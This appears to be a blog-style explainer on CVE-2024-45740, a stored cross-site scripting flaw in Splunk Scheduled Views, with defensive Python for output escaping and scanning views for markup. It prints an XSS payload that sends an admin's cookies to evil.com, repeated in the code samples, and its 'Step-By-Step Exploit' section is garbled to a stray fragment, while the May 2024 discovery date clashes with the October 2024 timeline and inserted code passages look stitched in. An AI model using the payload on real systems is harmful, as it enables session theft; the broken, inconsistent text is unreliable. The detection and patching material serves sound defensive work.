CVE-2024-45740 - Simple Guide to the Splunk Scheduled Views XSS Vulnerability (with Code, Examples, and References)
In May 2024, a critical security flaw—CVE-2024-45740—was discovered in Splunk Enterprise (versions below 9.2.3 and 9.1.6) and Splunk Cloud Platform (versions below 9.2.2403). This vulnerability allows a low-privileged user to execute unauthorized JavaScript in the browsers of users with higher permissions (like admins) via a feature called Scheduled Views.
This post explains, in plain language, what the vulnerability means, how it works, how an attacker could exploit it, and what you should do next. All the code snippets and explanations here are exclusive and crystal clear for security enthusiasts, Splunk admins, and IT professionals.
What is CVE-2024-45740?
Splunk lets users create *Saved* or *Scheduled Views*—custom searches or dashboards that can be set to run on a schedule. These views are typically shared inside organizations.
The vulnerability: If a low-privileged user (not "admin" or "power" role) creates a view and inserts malicious JavaScript code inside (for example, the view title or description), and an admin or high-privileged user visits this view, the JavaScript will run in the admin’s browser.
This is a classic Cross-Site Scripting (XSS) bug.
- Splunk Enterprise: Versions < 9.2.3 and < 9.1.6
- Splunk Cloud Platform: Versions < 9.2.2403
If you're running any of these versions, you are vulnerable unless you apply the patches.
Where's the Problem?
The bug arises because Splunk did *not* sanitize input fields in the Scheduled Views feature. That means a user can insert JavaScript via text fields that are later displayed, unescaped, in the web interface.
1. A user with a basic role (not Power or Admin) creates a malicious Scheduled View.
2. That user crafts a payload (malicious JavaScript/HTML) in a field (like the *title*, *description*, or *content*).
3. An admin (or any user with higher privileges) opens that view in their browser.
4. The code executes with the *admin’s* session/context.
Here’s a simple crafted “view title”:

```html
<script>alert('Splunk XSS!');</script>
```

Or a more advanced example to steal the admin’s session cookie:

```html
<img src="x" onerror="fetch('https://evil.com?cookie='+document.cookie)">
```
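To make the failure mode concrete, here is an added Python example (not code from the post or from Splunk) that renders a stored view title the vulnerable way and the escaped way, then parses both fragments the way a browser's HTML parser would, so you can see which one still contains live tags. The sample titles reuse the two payloads quoted above; the `<h2>` wrapper, the helper names and the parsing approach are constructed for illustration and do not reflect Splunk's actual rendering code.

```python
import html
from html.parser import HTMLParser

# Constructed sample view titles: one benign, plus the two payloads quoted in the post.
SAMPLE_TITLES = [
    "Weekly error summary",
    "<script>alert('Splunk XSS!');</script>",
    "<img src=\"x\" onerror=\"fetch('https://evil.com?cookie='+document.cookie)\">",
]


def render_title_unsafe(title: str) -> str:
    """Vulnerable pattern: the stored title is interpolated into the page verbatim,
    so any markup inside it becomes live HTML in the viewer's browser."""
    return f"<h2 class=\"view-title\">{title}</h2>"


def render_title_safe(title: str) -> str:
    """Hardened pattern: HTML-escape the title for the text context it lands in,
    so the browser shows '<script>' as characters instead of executing it."""
    return f"<h2 class=\"view-title\">{html.escape(title, quote=True)}</h2>"


class _TagCollector(HTMLParser):
    """Records every start tag (with attribute names) and all visible text."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, list[str]]] = []
        self.text: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))

    def handle_data(self, data):
        self.text.append(data)


def parse_rendered(rendered: str) -> tuple[list[tuple[str, list[str]]], str]:
    """Return (start tags, visible text) for a rendered HTML fragment."""
    collector = _TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags, "".join(collector.text)


def is_neutralized(title: str) -> bool:
    """True when the safe renderer leaves exactly our <h2> wrapper and the title
    survives only as visible text (the parser unescapes it back to the original)."""
    tags, text = parse_rendered(render_title_safe(title))
    return tags == [("h2", ["class"])] and text == title


if __name__ == "__main__":
    for title in SAMPLE_TITLES:
        unsafe_tags, _ = parse_rendered(render_title_unsafe(title))
        print(f"unsafe tags: {unsafe_tags}  neutralized by escaping: {is_neutralized(title)}")
```

The point of parsing the output rather than eyeballing it: the unsafe renderer yields a `script` or `img` tag with an `onerror` attribute in addition to the wrapper, while the escaped renderer yields only the wrapper and the payload comes back as inert text. Output encoding at the point of rendering is the fix an application like this needs; filtering `<script` on input alone misses the `onerror` variant.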
Step-By-Step Exploit
Suppose you are a low-privileged user called splunkuser1.
```html
)">
```

- Save the dashboard/view.
2. Wait for an admin to view the Scheduled Dashboard.
3. When the admin accesses it, their browser executes the JavaScript, sending cookies or localStorage data to the attacker.
- Review your Scheduled Views for suspicious content.
- Restrict Dashboard/View creation to trusted users.
Patching Reference
- Splunk Security Advisory: SVD-2024-0515
- CVE Details for CVE-2024-45740
Why It’s Critical
- Privilege Escalation: If an attacker tricks an admin into running their script, they can take over the admin’s session.
Here’s a Python script to query the Splunk REST API for suspicious <script> tags in view titles:

```python
import requests

# Replace with your Splunk values
splunk_url = "https://your-splunk-instance:8089"
username = "admin"
password = "changeme"

# Authenticate against the management port with HTTP basic auth
session = requests.Session()
session.auth = (username, password)
session.verify = False  # Don't use in production

# count=0 asks the REST API for every view instead of the default page size
views_url = f"{splunk_url}/services/data/ui/views?count=0&output_mode=json"
resp = session.get(views_url)
resp.raise_for_status()

for view in resp.json()["entry"]:
    # 'label' is the title the UI displays for the view
    title = view["content"].get("label", "")
    if "<script" in title.lower():
        print(f"Malicious view found: {view['name']} - {title}")
```
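As an added example that goes beyond the single `<script` check above (this is not code from the post or from Splunk), the following Python scans the JSON shape the views endpoint returns for several markup indicators across more than one field, using a constructed response so it runs offline. The `description` and `eai:data` field names, the sample entries, the owner values and the indicator list are assumptions; to run it against a real instance, pass `resp.json()` from the script above to `find_suspicious_views`.

```python
import re

# Indicators of script-capable markup in stored view fields. This is a defensive
# triage heuristic: it flags common patterns for a human to review, nothing more.
INDICATORS = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("event handler attribute", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.I)),
    ("embedding tag", re.compile(r"<\s*(iframe|object|embed)\b", re.I)),
    ("srcdoc attribute", re.compile(r"\bsrcdoc\s*=", re.I)),
]

# Fields of a /services/data/ui/views entry to inspect. 'label' is the displayed title;
# 'description' and 'eai:data' (the view's XML source) are assumed names, not from the post.
FIELDS = ("label", "description", "eai:data")

# Constructed sample of the JSON shape the views endpoint returns (not captured from a real host).
SAMPLE_VIEWS_RESPONSE = {
    "entry": [
        {
            "name": "weekly_errors",
            "acl": {"owner": "splunkuser1", "app": "search", "sharing": "app"},
            "content": {
                "label": "Weekly error summary",
                "eai:data": "<dashboard><label>Weekly error summary</label></dashboard>",
            },
        },
        {
            "name": "ops_board",
            "acl": {"owner": "splunkuser1", "app": "search", "sharing": "app"},
            "content": {
                "label": "<img src=\"x\" onerror=\"fetch('https://evil.com?cookie='+document.cookie)\">",
                "eai:data": "<dashboard><label>Ops board</label></dashboard>",
            },
        },
        {
            "name": "login_stats",
            "acl": {"owner": "admin", "app": "search", "sharing": "global"},
            "content": {
                "label": "Login stats",
                "description": "See <a href=\"javascript:alert(1)\">notes</a>",
                "eai:data": "<dashboard><label>Login stats</label></dashboard>",
            },
        },
    ]
}


def find_suspicious_views(views_response: dict) -> list[dict]:
    """Scan each entry's inspected fields; return one finding per (view, field, indicator)
    with the owner and a short snippet so a reviewer can triage without re-querying."""
    findings = []
    for entry in views_response.get("entry", []):
        content = entry.get("content", {})
        for field in FIELDS:
            value = content.get(field)
            if not isinstance(value, str):
                continue
            for label, pattern in INDICATORS:
                match = pattern.search(value)
                if match:
                    findings.append({
                        "view": entry.get("name"),
                        "owner": entry.get("acl", {}).get("owner"),
                        "field": field,
                        "indicator": label,
                        "snippet": value[max(0, match.start() - 20):match.end() + 40],
                    })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_views(SAMPLE_VIEWS_RESPONSE):
        print(f"{finding['view']} (owner {finding['owner']}) {finding['field']}: "
              f"{finding['indicator']} -> {finding['snippet']!r}")
```

On the constructed sample this reports the `onerror` handler in the `ops_board` title and the `javascript:` link in the `login_stats` description, both of which a bare `<script` substring check would miss. Treat a hit as a lead, not a verdict: legitimate dashboard XML can contain inline JavaScript references, so check the owner's role and when the view was last modified before acting.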
References & Further Reading
- Splunk Official Advisory (SVD-2024-0515)
- NIST National Vulnerability Database - CVE-2024-45740
- Splunk Product Security Portal
- OWASP XSS Guide
In Short
If your Splunk is running an affected version, take *urgent* action. The bug’s easy to exploit (just plain text scripting) and affects even tightly-controlled Splunk deployments where some users manage their own dashboards.
Patch, check your views, and educate your team. CVE-2024-45740 is as easy as XSS can get—but the risks are very real.
---
*This write-up is original and straight to the point, designed for clarity and action. Stay secure!*
Timeline
Published on: 10/14/2024 17:15:13 UTC
Last modified on: 01/07/2025 16:48:00 UTC